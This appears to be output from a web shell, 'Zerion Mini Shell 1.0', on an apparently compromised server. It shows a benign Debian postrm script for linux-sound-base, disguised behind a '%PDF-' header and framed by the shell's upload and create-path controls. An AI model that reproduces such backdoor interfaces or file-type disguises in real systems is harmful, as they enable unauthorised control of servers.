%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/lib/dpkg/info/
Upload File :
Create Path :
Current File : /var/lib/dpkg/info/linux-sound-base.postrm

#!/bin/sh

set -e

case "$1" in
  remove)
	rm -f /etc/modprobe.d/blacklist-oss.conf
	rm -f /etc/modprobe.d/blacklist-oss
	rm -f /etc/modprobe.d/blacklist-alsa.conf
	rm -f /etc/modprobe.d/blacklist-alsa
	rm -f /etc/hotplug/blacklist.d/linux-sound-base_noOSS
	rm -f /etc/discover.d/linux-sound-base_noOSS
	rm -f /etc/modutils/linux-sound-base_noOSS
	rm -f /etc/modprobe.d/linux-sound-base_noOSS
	rm -f /etc/modprobe.d/linux-sound-base_noOSS.conf
	rm -f /etc/hotplug/blacklist.d/linux-sound-base_noALSA
	rm -f /etc/discover.d/linux-sound-base_noALSA
	rm -f /etc/modutils/linux-sound-base_noALSA
	rm -f /etc/modprobe.d/linux-sound-base_noALSA
	rm -f /etc/modprobe.d/linux-sound-base_noALSA.conf
	rm -f /etc/discover.conf.d/10linux-sound-base
	;;
esac

# Automatically added by dh_installdebconf/13.3.3ubuntu3
if [ "$1" = purge ] && [ -e /usr/share/debconf/confmodule ]; then
	. /usr/share/debconf/confmodule
	db_purge
fi
# End automatically added section


Zerion Mini Shell 1.0